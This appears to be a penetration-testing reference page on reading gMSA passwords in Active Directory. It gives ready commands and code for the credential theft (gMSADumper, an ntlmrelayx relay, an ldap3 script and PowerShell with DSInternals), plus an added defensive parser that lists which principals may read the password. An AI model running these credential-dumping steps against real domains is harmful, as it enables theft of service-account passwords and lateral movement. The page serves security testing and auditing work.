ReadGMSAPassword
This abuse can be carried out when controlling an object that has, for instance, AllExtendedRights over a target computer. The attacker can then read the password of the target's gMSA (group Managed Service Account).
UNIX-like
On UNIX-like systems, gMSADumper (Python) can be used to read and decode gMSA passwords. It supports cleartext password, pass-the-hash and Kerberos authentication.
gMSADumper.py -u 'user' -p 'password' -d 'domain.local'
Alternative #1: Impacket's ntlmrelayx tool can be used to read and decode gMSA passwords.
ntlmrelayx.py -t ldaps://10.0.0.5 -debug --dump-gmsa --no-dump --no-da --no-acl --no-validate-privs
In order to easily fake a relayed authentication, once the relay servers are up and running, the tester can browse http://127.0.0.1/ to trigger a basic authentication prompt; the credentials entered there are then relayed by ntlmrelayx.
Alternative #2: The msDS-ManagedPassword attribute can also be manually obtained by running the following Python script. The following code can then be used to decode the blob.
import ldap3
from ldap3 import NTLM, SUBTREE  # authentication and search-scope constants used below

target_dn = ""  # something like 'CN=Target User,OU=Standard Accounts,DC=domain,DC=local'
domain = "domain"
username = "username"
user = "{}\\{}".format(domain, username)
password = "password"

server = ldap3.Server(domain)
connection = ldap3.Connection(server=server, user=user, password=password, authentication=NTLM)
connection.bind()
# The DC only returns msDS-ManagedPassword over a confidential channel (LDAPS or a sealed LDAP session);
# over plain LDAP the attribute is silently omitted from the results.
connection.search(target_dn, '(&(ObjectClass=msDS-GroupManagedServiceAccount))', search_scope=SUBTREE, attributes=['sAMAccountName', 'msDS-ManagedPassword'])
print(connection.entries)
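Added example, not from the original page or from any of the tools it lists: the same LDAP session can also fetch the gMSA's msDS-GroupMSAMembership attribute, which holds the security descriptor the DC evaluates before returning the managed password blob. The script below parses that self-relative descriptor (SECURITY_DESCRIPTOR, ACL, ACE and SID layouts as documented in [MS-DTYP]) and lists the principals with ACCESS_ALLOWED entries, which is what a defender audits to find out who can perform this abuse. The sample descriptor, the SIDs in it and the FULL_CONTROL mask value are constructed assumptions for the demonstration.

```python
import struct

# Added example (not from the original page): parse a gMSA's msDS-GroupMSAMembership
# security descriptor and list which principals are allowed to retrieve its
# msDS-ManagedPassword. Structure layouts follow [MS-DTYP]; the sample descriptor
# is constructed inline so the parser runs offline.

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACCESS_DENIED_ACE_TYPE = 0x01
# Assumption: the access mask written for PrincipalsAllowedToRetrieveManagedPassword (full control).
FULL_CONTROL = 0x000F01FF


def build_sid(sid_str):
    """Encode 'S-1-5-21-...' as a binary SID: revision, sub-authority count,
    48-bit big-endian identifier authority, little-endian sub-authorities."""
    parts = sid_str.split('-')
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(x) for x in parts[3:]]
    return (struct.pack('<BB', revision, len(subs)) + authority.to_bytes(6, 'big')
            + b''.join(struct.pack('<I', s) for s in subs))


def build_ace(ace_type, mask, sid_str):
    """ACE = header (AceType, AceFlags, AceSize) + access mask + SID."""
    body = struct.pack('<I', mask) + build_sid(sid_str)
    return struct.pack('<BBH', ace_type, 0, 4 + len(body)) + body


def build_descriptor(aces, null_dacl=False):
    """Self-relative descriptor carrying only a DACL (owner/group/SACL offsets are 0)."""
    control = SE_SELF_RELATIVE | SE_DACL_PRESENT
    if null_dacl:  # DACL flagged present but offset 0: a NULL DACL
        return struct.pack('<BBHIIII', 1, 0, control, 0, 0, 0, 0)
    acl_body = b''.join(aces)
    # ACL header: AclRevision, Sbz1, AclSize, AceCount, Sbz2
    acl = struct.pack('<BBHHH', 2, 0, 8 + len(acl_body), len(aces), 0) + acl_body
    # Descriptor header is 20 bytes, so the DACL starts at offset 20
    return struct.pack('<BBHIIII', 1, 0, control, 0, 0, 0, 20) + acl


def parse_sid(buf, off):
    """Decode a binary SID at offset `off` back into its 'S-1-...' string form."""
    revision, sub_count = struct.unpack_from('<BB', buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], 'big')
    subs = struct.unpack_from('<%dI' % sub_count, buf, off + 8)
    return 'S-%d-%d' % (revision, authority) + ''.join('-%d' % s for s in subs)


def principals_allowed_to_retrieve(blob):
    """Return [(sid, access_mask), ...] for ACCESS_ALLOWED ACEs, [] for an empty DACL
    (nobody can read the password), or None for a missing/NULL DACL, which imposes
    no restriction at all and is itself a finding."""
    revision, _, control, _, _, _, off_dacl = struct.unpack_from('<BBHIIII', blob, 0)
    if revision != 1 or not control & SE_SELF_RELATIVE:
        raise ValueError('unexpected security descriptor format')
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return None
    _, _, _, ace_count, _ = struct.unpack_from('<BBHHH', blob, off_dacl)
    off = off_dacl + 8
    allowed = []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from('<BBH', blob, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            mask, = struct.unpack_from('<I', blob, off + 4)
            allowed.append((parse_sid(blob, off + 8), mask))
        off += ace_size  # AceSize lets us skip ACE types we do not interpret
    return allowed


# Constructed sample: one allowed group and one explicitly denied user (made-up SIDs).
SAMPLE_BLOB = build_descriptor([
    build_ace(ACCESS_ALLOWED_ACE_TYPE, FULL_CONTROL, 'S-1-5-21-1111111111-2222222222-3333333333-1107'),
    build_ace(ACCESS_DENIED_ACE_TYPE, FULL_CONTROL, 'S-1-5-21-1111111111-2222222222-3333333333-1108'),
])

if __name__ == '__main__':
    for sid, mask in principals_allowed_to_retrieve(SAMPLE_BLOB):
        print('%s can retrieve the managed password (mask 0x%08X)' % (sid, mask))
```

Against a live directory, add 'msDS-GroupMSAMembership' to the attribute list of the ldap3 search above and pass the raw bytes (`entry['msDS-GroupMSAMembership'].raw_values[0]`) to `principals_allowed_to_retrieve`; every SID it returns, resolved to a group or user, is a principal that can perform this abuse, and a `None` result means the attribute grants the password to anyone who asks.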
Windows
On Windows systems, there are multiple ways to read gMSA passwords.
The first one uses the Active Directory and DSInternals PowerShell modules.
# Save the blob to a variable
$gmsa = Get-ADServiceAccount -Identity 'Target_Account' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'

# Decode the data structure using the DSInternals module
ConvertFrom-ADManagedPasswordBlob $mp
The second one relies on GMSAPasswordReader (C#).
.\GMSAPasswordReader.exe --AccountName 'Target_Account'